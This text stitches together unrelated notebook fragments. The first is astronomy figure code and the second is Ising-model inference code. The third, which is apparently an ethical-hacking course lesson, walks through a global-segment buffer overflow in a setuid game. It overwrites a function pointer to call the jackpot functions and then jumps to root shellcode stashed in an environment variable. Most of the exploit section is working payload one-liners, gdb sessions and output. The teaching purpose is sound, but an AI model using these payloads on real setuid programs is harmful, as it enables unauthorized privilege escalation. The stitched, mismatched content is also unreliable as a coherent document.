#Recentre and resize
f.recenter(32.356, -10.125, radius=1.5/60.)
#Overlay HI contours
f.show_contour(data='NW_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],
colors='lime',levels=numpy.arange(0.1,5.,0.05))
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Save
if save_figs:
plt.savefig('Fig15-NW_clump_mom0_cont.pdf')
#Clip the moment 1 map
mask_mom1(gal='NW_clump',level=0.1)
#Initialise figure for clipped map
f = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])
#Recentre and resize
f.recenter(32.356, -10.125, radius=1.5/60.)
#Set colourbar scale
f.show_colorscale(cmap='jet',vmin=3530.,vmax=3580.)
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Show and label colourbar
f.add_colorbar()
f.colorbar.set_axis_label_text('$V_\mathrm{opt}$ [km/s]')
#Add beam ellipse
f.add_beam()
f.beam.set_color('k')
f.beam.set_corner('bottom right')
#Save
if save_figs:
plt.savefig('Fig15-NW_clump_mom1.pdf')
#Initialise figure using DECaLS r-band image
f = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])
#Display DECaLS grz image
f.show_rgb(grz_image_decals)
#Recentre and resize
f.recenter(32.463, -10.181, radius=1.5/60.)
#Overlay HI contours
f.show_contour(data='E_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],
colors='lime',levels=numpy.arange(0.1,5.,0.05))
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Save
if save_figs:
plt.savefig('Fig15-E_clump_mom0_cont.pdf')
#Clip the moment 1 map
mask_mom1(gal='E_clump',level=0.1)
#Initialise figure for clipped map
f = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])
#Recentre and resize
f.recenter(32.463, -10.181, radius=1.5/60.)
#Set colourbar scale
f.show_colorscale(cmap='jet',vmin=3875.,vmax=3925.)
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Show and label colourbar
f.add_colorbar()
f.colorbar.set_axis_label_text('$V_\mathrm{opt}$ [km/s]')
#Add beam ellipse
f.add_beam()
f.beam.set_color('k')
f.beam.set_corner('bottom right')
#Save
if save_figs:
plt.savefig('Fig15-E_clump_mom1.pdf')
#Initialise figure using DECaLS r-band image
f = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])
#Display DECaLS grz image
f.show_rgb(grz_image_decals)
#Recentre and resize
f.recenter(32.475, -10.215, radius=1.5/60.)
#Overlay HI contours
f.show_contour(data='S_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],
colors='lime',levels=numpy.arange(0.1,5.,0.05))
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Save
if save_figs:
plt.savefig('Fig15-S_clump_mom0_cont.pdf')
#Clip the moment 1 map
mask_mom1(gal='S_clump',level=0.1)
#Initialise figure for clipped map
f = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])
#Recentre and resize
f.recenter(32.475, -10.215, radius=1.5/60.)
#Set colourbar scale
f.show_colorscale(cmap='jet',vmin=4050.,vmax=4100.)
#Add grid lines
f.add_grid()
f.grid.set_color('black')
#Show and label colourbar
f.add_colorbar()
f.colorbar.set_axis_label_text('$V_\mathrm{opt}$ [km/s]')
#Add beam ellipse
f.add_beam()
f.beam.set_color('k')
f.beam.set_corner('bottom right')
#Save
if save_figs:
plt.savefig('Fig15-S_clump_mom1.pdf')
```
|
github_jupyter
|
```
import matplotlib.pyplot as plt
import numpy as np
import numpy.linalg as nplin
import itertools
#from coniii import *
from sklearn.linear_model import LinearRegression
np.random.seed(0)
def operators(s):
#generate terms in the energy function
n_seq,n_var = s.shape
ops = np.zeros((n_seq,n_var+int(n_var*(n_var-1)/2.0)))
jindex = 0
for index in range(n_var):
ops[:,jindex] = s[:,index]
jindex +=1
for index in range(n_var-1):
for index1 in range(index+1,n_var):
ops[:,jindex] = s[:,index]*s[:,index1]
jindex +=1
return ops
def energy_ops(ops,w):
return np.sum(ops*w[np.newaxis,:],axis=1)
def generate_seqs(n_var,n_seq,n_sample=30,g=1.0,w_true1=0.0):
n_ops = n_var+int(n_var*(n_var-1)/2.0)
#w_true = g*(np.random.rand(ops.shape[1])-0.5)/np.sqrt(float(n_var))
if np.isscalar(w_true1):
w_true = np.random.normal(0.,g/np.sqrt(n_var),size=n_ops)
else:
w_true = w_true1
samples = np.random.choice([1.0,-1.0],size=(n_seq*n_sample,n_var),replace=True)
ops = operators(samples)
#n_ops = ops.shape[1]
sample_energy = energy_ops(ops,w_true)
p = np.exp(sample_energy)
p /= np.sum(p)
out_samples = np.random.choice(np.arange(n_seq*n_sample),size=n_seq,replace=True,p=p)
return w_true,samples[out_samples] #,p[out_samples],sample_energy[out_samples]
def hopfield_model(s):
ops = operators(s)
w = np.mean(ops,axis=0)
#print('hopfield error ',nplin.norm(w-w_true))
return w
def boltzmann_machine_exact(s,s_all,max_iter=150,alpha=5e-2,cov=False):
n_seq,n_var = s.shape
ops = operators(s)
cov_inv = np.eye(ops.shape[1])
ops_obs = np.mean(ops,axis=0)
ops_model = operators(s_all)
n_ops = ops.shape[1]
np.random.seed(13)
w = np.random.rand(n_ops)-0.5
for iterate in range(max_iter):
energies_w = energy_ops(ops_model,w)
probs_w = np.exp(energies_w)
probs_w /= np.sum(probs_w)
if iterate%10 == 0:
#print(iterate,nplin.norm(w-w_true)) #,nplin.norm(spin_cov_w-spin_cov_obs))
MSE = ((w-w_true)**2).mean()
print(iterate,MSE)
w += alpha*cov_inv.dot(ops_obs - np.sum(ops_model*probs_w[:,np.newaxis],axis=0))
print('final',iterate,MSE)
return w
def eps_machine(s,eps_scale=0.1,max_iter=151,alpha=0.1):
MSE = np.zeros(max_iter)
KL = np.zeros(max_iter)
E_av = np.zeros(max_iter)
n_seq,n_var = s.shape
ops = operators(s)
n_ops = ops.shape[1]
cov_inv = np.eye(ops.shape[1])
np.random.seed(13)
w = np.random.rand(n_ops)-0.5
w_iter = np.zeros((max_iter,n_ops))
for i in range(max_iter):
#eps_scale = np.random.rand()/np.max([1.,np.max(np.abs(w))])
energies_w = energy_ops(ops,w)
probs_w = np.exp(energies_w*(eps_scale-1))
z_data = np.sum(probs_w)
probs_w /= z_data
ops_expect_w = np.sum(probs_w[:,np.newaxis]*ops,axis=0)
#if iterate%int(max_iter/5.0)==0:
#E_exp = (probs_w*energies_w).sum()
#KL[i] = -E_exp - np.log(z_data) + np.sum(np.log(np.cosh(w*eps_scale))) + n_var*np.log(2.)
E_av[i] = energies_w.mean()
MSE[i] = ((w-w_true)**2).mean()
#print(RMSE[i])
#print(eps_scale,iterate,nplin.norm(w-w_true),RMSE,KL,E_av)
sec_order = w*eps_scale
w += alpha*cov_inv.dot((ops_expect_w - sec_order))
#print('final ',eps_scale,iterate,nplin.norm(w-w_true))
#w_iter[i,:] = w
return MSE,-E_av,w
max_iter = 100
n_var,n_seq = 40,5000
g = 1.0
n_ops = n_var+int(n_var*(n_var-1)/2.0)
w_true,seqs = generate_seqs(n_var,n_seq,g=g)
#VP modification
w_true1,seqs_test = generate_seqs(n_var,n_seq,g=g,w_true1=w_true)
#eps_list = [0.25,0.3,0.35,0.4,0.45,0.5]
#eps_list = [0.36,0.37,0.38,0.39,0.40,0.41,0.42,0.43,0.44]
eps_list = np.linspace(0.4,0.8,9)
n_eps = len(eps_list)
MSE = np.zeros((n_eps,max_iter))
KL = np.zeros((n_eps,max_iter))
E_av = np.zeros((n_eps,max_iter))
w_eps = np.zeros((n_eps,n_ops))
for i,eps in enumerate(eps_list):
print(eps)
MSE[i,:],E_av[i,:],w_eps[i,:] = eps_machine(seqs,eps_scale=eps,max_iter=max_iter)
plt.plot(eps_list,E_av[:,-1])
# optimal eps
ieps = np.argmax(E_av[:,-1])
print('optimal eps:',ieps,eps_list[ieps])
w = w_eps[ieps]
plt.plot(w_true,w,'ro')
plt.plot(w_true,w_true1,'ko',alpha=0.1)
plt.plot([-0.6,0.6],[-0.6,0.6])
# # Z_all_true
# s_all = np.asarray(list(itertools.product([1.0, -1.0], repeat=n_var)))
# ops_all = operators(s_all)
# E_all_true = energy_ops(ops_all,w_true)
# P_all_true = np.exp(E_all_true)
# Z_all_true = P_all_true.sum()
# np.log(Z_all_true)
# random configs
#n_random = 10000
#i_random = np.random.choice(s_all.shape[0],n_random)
#s_random = s_all[i_random]
#ops_random = operators(s_random)
#E_true = energy_ops(ops_random,w_true)
#P_true = np.exp(E_true)
#p0 = P_true/Z_all_true
#VP modification - look at test seqs that are representative of the actual distribution
ops_test = operators(seqs_test)
#E_true_test = energy_ops(ops_test,w_true)
#P_true_test = np.exp(E_true_test)
#p0_test = P_true_test/Z_all_true
seq_unique,i_seq,seq_count1 = np.unique(seqs,return_inverse=True,return_counts=True,axis=0)
seq_count = seq_count1[i_seq]
#VP modification
seq_unique_test,i_seq_test,seq_count1_test = np.unique(seqs_test,return_inverse=True,return_counts=True,axis=0)
seq_count_test = seq_count1_test[i_seq_test]
def partition_data(seqs,eps=0.999):
ops = operators(seqs)
energies_w = energy_ops(ops,w)
probs_w = np.exp(energies_w*(eps-1))
z_data = np.sum(probs_w)
probs_w /= z_data
x = np.log(seq_count*probs_w).reshape(-1,1)
y = eps*energies_w.reshape(-1,1)
reg = LinearRegression().fit(x,y)
score = reg.score(x,y)
b = reg.intercept_[0]
m = reg.coef_[0][0] # slope
# set slope = 1
lnZ_data = (eps*energies_w).mean() - (np.log(seq_count*probs_w)).mean()
# exact (to compare)
#probs_all = np.exp(eps*energies_all)
#Z_all = np.sum(probs_all)
#lnZ_all[i] = np.log(Z_all)
print(eps,score,m,b,lnZ_data)
return lnZ_data
#lnZ_data = partition_data(seqs,eps=0.9999)
#print(lnZ_data)
# Z_infer:
#Z_infer = np.exp(lnZ_data) ### NOTE
#E_infer = energy_ops(ops_random,w)
#P_infer = np.exp(E_infer)
#p1 = P_infer/Z_infer
#plt.plot(-np.log(p0),-np.log(p1),'ko',markersize=3)
#plt.plot([5,35],[5,35])
# Z_direct at eps = 1 : unique
ops_unique = operators(seq_unique)
#energies_w = energy_ops(ops_unique,w)
#probs_w = np.exp(energies_w)
#Z_direct = (probs_w/seq_count1).mean()
#lnZ_direct = np.log(Z_direct) + np.log(n_seq)
#print(lnZ_direct)
# VP modification
freq_count1 = seq_count1/n_seq
freq_count1_test = seq_count1_test/n_seq
ops_unique_test = operators(seq_unique_test)
for i,eps in enumerate(eps_list):
energies_w = energy_ops(ops_unique,w_eps[i,:])
energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])
alpha = 1.5
lnZ_unique = -np.mean(freq_count1**alpha * (-energies_w + np.log(freq_count1)))/np.mean(freq_count1**alpha )
E_mean_f = -np.sum(energies_w*freq_count1)
probs_test = np.exp(energies_w_test-lnZ_unique)
print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))
# all obs
ops = operators(seqs)
energies_w = energy_ops(ops,w)
probs_w = np.exp(energies_w)
Z_direct = (probs_w/seq_count).mean()
lnZ_direct = np.log(Z_direct) + np.log(n_seq)
print(lnZ_direct)
# Z from optimal eps
eps0 = eps_list[ieps]
print(eps0)
ops_unique = operators(seq_unique)
energies_w = energy_ops(ops_unique,w)
probs_w = np.exp(eps0*energies_w)
Z1 = (probs_w).sum()
Z2 = (seq_count1*np.exp((eps0-1)*energies_w)).sum()
lnZ = np.log(Z1*n_seq/Z2)
print(lnZ)
seq_unique.shape[0]
# VP modification -1/13/2020
def free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2e-1,toler=0.1):
energies_w = energy_ops(ops_uniq,w)
log_f_count = np.log(f_count_uniq)
entropy = - np.sum(f_count_uniq*log_f_count)
E_mean_f = -np.sum(energies_w*f_count_uniq)
F_0 = E_mean_f - entropy
F_gamma = F_0
update = np.inf
while update > toler:
F_gamma_new = F_0 + np.sum(f_count_uniq*np.sinh(gamma*(F_gamma + energies_w - log_f_count)))/gamma
print((F_gamma + energies_w - log_f_count)[3:7])
update = np.abs(F_gamma - F_gamma_new)
F_gamma = F_gamma_new
return F_gamma
def free_energy_improved(f_count_uniq,ops_uniq,w,gamma=0.02,toler=5e-2):
    F_true = 4*(free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=gamma,toler=toler) -
                0.25*free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2*gamma,toler=toler))/3.0
    return F_true
# VP modification - 1/13/2020
# try to get free energy by integrating mean energy over temperature
def free_energy_integrated(f_count_uniq,ops_uniq,w,d_beta=0.1,obs=True):
    energies_w = energy_ops(ops_uniq,w)  # compute locally; previously this silently used a global energies_w
    E_mean_f = 0.0
    for i in range(int(1.0/d_beta)):
        bet = (i+0.5)*d_beta
        if obs:
            E_mean_f += -np.sum(energies_w*f_count_uniq**bet)/np.sum(f_count_uniq**bet)
        else:
            E_mean_f += -np.sum(energies_w*np.exp(energies_w*bet))/np.sum(np.exp(energies_w*bet))
    return E_mean_f*d_beta
# VP modification -1/13/2020
# try to find free energy with the upper and lower bounds
freq_count1 = seq_count1/n_seq
freq_count1_test = seq_count1_test/n_seq
ops_unique_test = operators(seq_unique_test)
E_mean_f_list = np.zeros(len(eps_list))
lnZ_unique_list = np.zeros(len(eps_list))
lnZ_unique_E_mean_list = np.zeros(len(eps_list))
X_squared_list = np.zeros(len(eps_list))
X_squared_list_train = np.zeros(len(eps_list))
for i,eps in enumerate(eps_list):
    energies_w = energy_ops(ops_unique,w_eps[i,:])
    energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])
    # lnZ_unique = -free_energy_improved(freq_count1,ops_unique,w_eps[i,:],gamma=0.04,toler=1e-1)
    lnZ_unique = -free_energy_integrated(freq_count1,ops_unique,w_eps[i,:],obs=False)
    E_mean_f = -np.sum(energies_w*freq_count1)
    E_mean_f_test = -np.sum(energies_w_test*freq_count1_test)
    probs_test = np.exp(energies_w_test-lnZ_unique)
    probs_train = np.exp(energies_w-lnZ_unique)
    print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,-lnZ_unique - E_mean_f_test,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))
    # 2020.01.13: Tai added
    E_mean_f_list[i] = E_mean_f
    lnZ_unique_list[i] = lnZ_unique
    lnZ_unique_E_mean_list[i] = -lnZ_unique - E_mean_f
    X_squared_list[i] = np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test)
    X_squared_list_train[i] = np.mean(((probs_train-freq_count1)**2)/freq_count1)
nx,ny = 1,6
fig, ax = plt.subplots(ny,nx,figsize=(nx*3,ny*2.2))
ax[0].plot(eps_list, MSE[:,-1],'ko-')
ax[1].plot(eps_list, E_mean_f_list,'ko-')
ax[2].plot(eps_list, lnZ_unique_list,'ko-')
ax[3].plot(eps_list, lnZ_unique_E_mean_list,'ko-')
ax[4].plot(eps_list, X_squared_list,'ko-')
ax[5].plot(eps_list, X_squared_list_train,'ko-')
ax[0].set_ylabel('MSE')
ax[1].set_ylabel('Energy')
ax[2].set_ylabel('LnZ')
ax[3].set_ylabel('-LnZ-Energy')
ax[4].set_ylabel('X_squared_test')
ax[5].set_ylabel('X_squared_train')
plt.tight_layout(h_pad=0.5, w_pad=0.6)
#plt.savefig('fig1.pdf', format='pdf', dpi=100)
```
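Under the notebook's convention (`probs_w = np.exp(energies_w)`, i.e. `energies_w` are log-weights), `free_energy_integrated` is a thermodynamic integration over the inverse temperature. A stdlib-only sanity check of the underlying identity on toy log-weights (not the notebook's data):

```python
import math

# Toy check of the identity behind free_energy_integrated:
#   ln Z(beta=1) = ln N + integral_0^1 <e>_beta d(beta),
# where states have log-weights e_i and probabilities ~ exp(beta * e_i).
log_weights = [0.3, -1.2, 2.0, 0.5]

def mean_logweight(beta):
    z = sum(math.exp(beta * e) for e in log_weights)
    return sum(e * math.exp(beta * e) for e in log_weights) / z

d_beta = 1e-4  # midpoint rule, same discretization style as the cell above
integral = sum(mean_logweight((i + 0.5) * d_beta) for i in range(int(1 / d_beta))) * d_beta
lnZ_ti = math.log(len(log_weights)) + integral
lnZ_direct = math.log(sum(math.exp(e) for e in log_weights))
print(lnZ_ti, lnZ_direct)  # the two agree to ~1e-8
```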
# Global Segment Overflow
- recall function pointers are pointers that store addresses of functions/code
- see [Function-Pointers notebook](./Function-Pointers.ipynb) for a review
- function pointers can be overwritten using overflow techniques to point to different code/function
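Before diving into the game, the core idea can be sketched with a toy memory model in Python (purely illustrative: a flat `bytearray` standing in for the bss segment, not real process memory):

```python
import struct

# Toy model of the bss layout: a 100-byte name buffer followed by a 4-byte function pointer.
NAME_SIZE = 100

def write_name(memory, data):
    """Unbounded copy, like the vulnerable input routine: stops at newline, not at 100 bytes."""
    for i, b in enumerate(data.split(b"\n")[0]):
        memory[i] = b

memory = bytearray(NAME_SIZE + 4)
memory[NAME_SIZE:] = struct.pack("<I", 0x0804B141)  # pretend current_game points at a game function

write_name(memory, b"A" * 100 + b"BBBB\n")          # 104 bytes into a 100-byte field
overwritten = struct.unpack("<I", bytes(memory[NAME_SIZE:]))[0]
print(hex(overwritten))  # 0x42424242 -- the pointer is now "BBBB"
```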
## Lucky 7 game
- various luck-based games that are favored toward the house
- program uses a function pointer to remember the last game played by the user
- the last game function's address is stored in the **User** structure
- player object is declared as an uninitialized global variable
- meaning the memory is allocated in the **bss** segment
- seteuid multi-user program that stores player's data in /var folder
- only root or sudo user can access players' info stored in /var folder
- each player is identified by the system's user id
- examine and compile and run game programs in demos/other_overflow/ folder
- game is divided into one header file and 2 .cpp files
- use the provided Makefile found in the same folder; uses C++17 specific features such as system specific file permission
- NOTE: program must be setuid, to read/write the database file: `/var/lucky7.txt`
```
! cat demos/other_overflow/main.cpp
! cat demos/other_overflow/lucky7.cpp
```
- change current working directory to other_overflow folder where the program and Makefile are
- compile using the Makefile
```
%cd ./demos/other_overflow
! echo kali | sudo -S make
# program uses /var/lucky7.txt to store player's information
# let's take a look into it
! echo kali | sudo -S cat /var/lucky7.txt
# userid credits player's_full_name
# if file exists, delete it to start fresh
! echo kali | sudo -S rm /var/lucky7.txt
! ls -al /var/lucky7.txt
! ls -l lucky7.exe
```
### play the interactive game
- lucky is an interactive program that doesn't work with Jupyter Notebook as of Aug. 2021
- Use Terminal to play the program; follow the menu provided by the program to play the game
- press `CTRL-Z` to temporarily suspend the current process (put it in the background)
- enter the `fg` command to bring the suspended program back to the foreground
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith
Welcome to the Lucky 7 Game John Smith.
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] -> Enter your choice [1-7]: 2
~*~*~ Lucky 777 ~*~*~
Costs 50 credits to play this game.
Machine will generate 3 random numbers each between 1 and 9.
If all 3 numbers are 7, you win a jackpot of 100 THOUSAND
If all 3 numbers match, you win 10 THOUSAND
Otherwise, you lose.
Enter to continue...
[DEBUG] current_game pointer 0x0804b1cd
3 random numers are: 4 3 4
Sorry! Better luck next time...
You have 450 credits
Would you like to play again? [y/n]:
```
### Find the vulnerability in the game
- do code review to find global **player** object and `change_username()`
- note **user** struct has declared name buffer of 100 bytes
- change_username() function uses the `mgets()` function to read and store data into the name field one character at a time until '\n'
- there's nothing to limit it to the length of the destination buffer!
- so, the game has buffer overrun/overflow vulnerability!
### Exploit the overflow vulnerability
- run the program
- explore the memory addresses of **name** and **current_game** using peda/gdb
- use gdb to debug the live process
- find the process id of lucky7.exe process
```bash
┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe
root 30439 0.1 0.0 5476 1344 pts/2 S+ 10:54 0:00 ./lucky7.exe
kali 30801 0.0 0.0 6320 724 pts/3 S+ 10:59 0:00 grep --color=auto lucky7.exe
```
- use the process_id to debug in gdb
```bash
┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ sudo gdb -q --pid=59004 --symbols=./lucky7.exe
(gdb) p/x &player.name
$1 = 0x8050148
(gdb) p/x &player.current_game
$2 = 0x80501ac
(gdb) p/u 0x80501ac - 0x8050148 # (address of player.current_game) - (address of player.name)
$3 = 100
```
- notice, **name[100]** is at a lower address
- **(\*current_game)()** is at a higher address; find the exact size that would overflow current_game
- the offset should be at least 100 bytes
### Let's overwrite the current_game's value with our controlled address
- create a string with 100As + BBBB
- detach the process from gdb and change the name with menu option 5 pasting the following buffer
- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242
```
# change the name to the following string
! python -c 'print("A"*100 + "B"*4)'
```
- run the program and play the last game after changing name
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith
Welcome to the Lucky 7 Game John Smith.
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] -> Enter your choice [1-7]: 1
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.
[DEBUG] current_game pointer 0x0804b141
the random number is: 8
Sorry! Better luck next time...
You have 490 credits
Would you like to play again? [y/n]: n
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 490 credits] -> Enter your choice [1-7]: 5
Change user name
Enter your new name:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 490 credits] -> Enter your choice [1-7]: 1
[DEBUG] current_game pointer 0x42424242
zsh: segmentation fault ./lucky7.exe
```
### Find useful functions/code in the program to execute
- **nm** command lists symbols in object files with corresponding addresses
- can be used to find addresses of various functions in a program
- the `jackpot()` functions are intriguing!
```bash
┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe
08050114 B __bss_start
08050120 b completed.0
U __cxa_atexit@GLIBC_2.1.3
08050104 D DATAFILE
080500f8 D __data_start
080500f8 W data_start
0804a440 t deregister_tm_clones
0804a420 T _dl_relocate_static_pie
0804a4c0 t __do_global_dtors_aux
0804fee4 d __do_global_dtors_aux_fini_array_entry
080500fc D __dso_handle
08050100 V DW.ref.__gxx_personality_v0
0804fee8 d _DYNAMIC
08050114 D _edata
080501b4 B _end
U exit@GLIBC_2.0
0804c3d8 T _fini
0804d000 R _fp_hw
0804a4f0 t frame_dummy
0804fed8 d __frame_dummy_init_array_entry
0804e438 r __FRAME_END__
U getchar@GLIBC_2.0
U getuid@GLIBC_2.0
08050000 d _GLOBAL_OFFSET_TABLE_
0804c34a t _GLOBAL__sub_I_DATAFILE
0804b5a0 t _GLOBAL__sub_I__Z10get_choiceR4User
w __gmon_start__
0804d7e4 r __GNU_EH_FRAME_HDR
U __gxx_personality_v0@CXXABI_1.3
0804a000 T _init
0804fee4 d __init_array_end
0804fed8 d __init_array_start
0804d004 R _IO_stdin_used
0804c3d0 T __libc_csu_fini
0804c370 T __libc_csu_init
U __libc_start_main@GLIBC_2.0
0804bcda T main
08050140 B player
U printf@GLIBC_2.0
U puts@GLIBC_2.0
U rand@GLIBC_2.0
0804a480 t register_tm_clones
U sleep@GLIBC_2.0
U srand@GLIBC_2.0
0804a3e0 T _start
U strcpy@GLIBC_2.0
U strlen@GLIBC_2.0
U time@GLIBC_2.0
08050114 D __TMC_END__
U _Unwind_Resume@GCC_3.0
0804bcd2 T __x86.get_pc_thunk.ax
0804c3d1 T __x86.get_pc_thunk.bp
0804a430 T __x86.get_pc_thunk.bx
0804bcd6 T __x86.get_pc_thunk.si
0804a4f2 T _Z10get_choiceR4User
0804bfeb T _Z10jackpot10Kv !!!!!!!!!<- JACKPOT ---> !!!!!!!!!!
0804b2b8 T _Z10lucky77777v
0804c038 T _Z11jackpot100Kv
0804b042 T _Z11printNumberi
0804b3fb T _Z12reset_creditPcR4User
0804aeeb T _Z12show_creditsRK4User
0804c181 T _Z13play_the_gamev
0804c0d2 T _Z14deduct_creditsv
0804c29c T _Z15change_usernamev
0804ac37 T _Z16read_player_dataPcR4User
0804b429 T _Z17get_random_numberi
0804a97f T _Z18update_player_dataPcR4User
0804a6c0 T _Z19register_new_playerPcR4User
0804b547 t _Z41__static_initialization_and_destruction_0ii
0804c2f1 t _Z41__static_initialization_and_destruction_0ii
0804ae82 T _Z5mgetsPc
0804b141 T _Z6lucky7v
0804b46d T _Z6rstripRNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
0804b1cd T _Z8lucky777v
0804c085 T _Z9jackpot1Mv
0804b7fc W _ZN9__gnu_cxx11char_traitsIcE2eqERKcS3_
0804b81c W _ZN9__gnu_cxx11char_traitsIcE6lengthEPKc
...
```
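Reading the jackpot address out of `nm` by hand gets old quickly; a small sketch that parses the output and packs the address little-endian for a payload (the regex assumes the three-column `address type name` format shown above, and the sample addresses are copied from this particular build — yours will differ):

```python
import re
import struct

def find_symbol_address(nm_output, needle):
    """Scan nm output for the first defined symbol whose (mangled) name contains
    `needle`; return its address as an int, or None if not found."""
    for line in nm_output.splitlines():
        m = re.match(r"([0-9a-f]{8})\s+[TtWw]\s+(\S+)", line.strip())
        if m and needle in m.group(2):
            return int(m.group(1), 16)
    return None

nm_sample = """0804bfeb T _Z10jackpot10Kv
0804c038 T _Z11jackpot100Kv"""

addr = find_symbol_address(nm_sample, "jackpot100K")
payload_addr = struct.pack("<I", addr)  # little-endian, ready to append after 100 filler bytes
print(hex(addr), payload_addr)
```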
### Script the interactive user input
- instead of typing options and commands interactively, they can be scripted and piped into the program
- program can then parse and use the input as if someone is interactively typing it from the std input stream
- make sure the game has been played at least once by the current user
- otherwise, the following script would need to start with the full name!
```
# play game #1, y, n;
# Enter 7 to quit
! python -c 'print("1\ny\nn\n7")'
%pwd
! python -c 'print("1\ny\nn\n7")' | ./lucky7.exe
# let's replace the current_game with our own data (BBBB)
! python -c 'print("1\nn\n5\n" + "A"*100 + "BBBB\n" + "1\nn\n7")' | ./lucky7.exe
# note the jackpot()'s address
! nm ./lucky7.exe | grep jackpot
# let's create a string mimicking game play with jackpot100K address!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")'
# the following is the sequence of user input to play the game
# now let's hit the Jackpot to receive 100K credit!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")' | ./lucky7.exe
# let's hit the Jackpot 2 times in a row!
# and change to your actual name
# now let's hit the Jackpot!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\ny\nn\n5\nJohn Smith\n2\nn\n7\n")' | ./lucky7.exe
```
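The one-liner payloads above can be wrapped into a reusable builder. A sketch — `JACKPOT_100K` here is an example address taken from the `nm` listing earlier; substitute whatever `nm` reports for your build:

```python
import struct

JACKPOT_100K = 0x0804C038  # example address from `nm`; yours may differ

def build_exploit_input(target_addr, name_len=100):
    """Menu keystrokes: play once (1, n), change name (5) to 100 filler bytes plus
    the little-endian target address, replay the stored 'last game' pointer (1, n),
    then quit (7)."""
    overflow_name = b"A" * name_len + struct.pack("<I", target_addr)
    return b"1\nn\n5\n" + overflow_name + b"\n" + b"1\nn\n7\n"

payload = build_exploit_input(JACKPOT_100K)
# usage: write payload to stdout and pipe it into ./lucky7.exe
```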
## Exploiting with shellcode
### Stashing Shellcode as an Environment Variable
- compile `getenvaddr.cpp` file as 32-bit binary
```
! g++ -m32 -o getenvaddr.exe getenvaddr.cpp
```
- export `/shellcode/shellcode_root.bin` as an env variable
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ export SHELLCODE=$(cat ../../shellcode/shellcode_root.bin)
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./getenvaddr.exe SHELLCODE ./lucky7.exe
SHELLCODE will be at 0xffffdf80 with reference to ./lucky7.exe
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\x80\xdf\xff\xff\n" + b"1\n")' > env_exploit
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ cat env_exploit - | ./lucky7.exe
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
